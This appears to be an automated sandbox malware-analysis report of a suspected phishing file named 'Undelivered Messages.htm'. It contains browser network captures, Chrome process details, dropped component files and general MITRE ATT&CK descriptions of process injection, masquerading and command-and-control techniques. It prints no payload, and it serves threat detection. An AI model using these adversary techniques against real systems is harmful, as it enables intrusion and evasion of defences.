2025-01-10 10:14:52 UTC	490	OUT	POST /report/v4?s=stcfEbrWmv4Q01B7ItBb8bFNbOn9mDEPJWIv2Xh3FZwCXnW9i5STS23l%2BTSBgiDQST321SfB5Q1BlxREkQnTY%2BWrX1QgRlCwlwpgpvpDJl2qypos4sOV%2BJgeRV%2BrQNIif6QnHkxmOg%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 398 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-10 10:14:52 UTC	398	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 30 34 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 38 34 2e 32 30 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 74 79 70 65 22 3a 22 61 62 61 6e 64 6f 6e 65 64 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 76 65 72 61 64 69 6f 2d 6e 65 77 62 61 6d Data Ascii: [{"age":1,"body":{"elapsed_time":1046,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.84.200","status_code":200,"type":"abandoned"},"type":"network-error","url":"https://fiveradio-newbam
2025-01-10 10:14:52 UTC	168	IN	HTTP/1.1 200 OK Content-Length: 0 date: Fri, 10 Jan 2025 10:14:52 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Target ID:	0
Start time:	05:14:45
Start date:	10/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Undelivered Messages.htm"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	2
Start time:	05:14:48
Start date:	10/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2492 --field-trial-handle=2432,i,13108727720244924784,14150484623795101669,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Undelivered Messages.htm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1808460881\Filtering Rules

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1808460881\LICENSE.txt

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1808460881\_metadata\verified_contents.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1808460881\manifest.fingerprint

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1808460881\manifest.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1848037099\_metadata\verified_contents.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1848037099\cr_en-us_500000_index.bin

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1848037099\manifest.fingerprint

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1848037099\manifest.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1996902927\LICENSE

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1996902927\_metadata\verified_contents.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1996902927\_platform_specific\win_x64\widevinecdm.dll

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1996902927\_platform_specific\win_x64\widevinecdm.dll.sig

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1996902927\manifest.fingerprint

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_1996902927\manifest.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_2086490785\LICENSE

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_2086490785\_metadata\verified_contents.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_2086490785\manifest.fingerprint

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_2086490785\manifest.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_2086490785\sets.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_382825366\Google.Widevine.CDM.dll

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_382825366\_metadata\verified_contents.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_382825366\manifest.fingerprint

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_382825366\manifest.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_585514529\_metadata\verified_contents.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4416_585514529\manifest.fingerprint

Windows Analysis Report
Undelivered Messages.htm

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre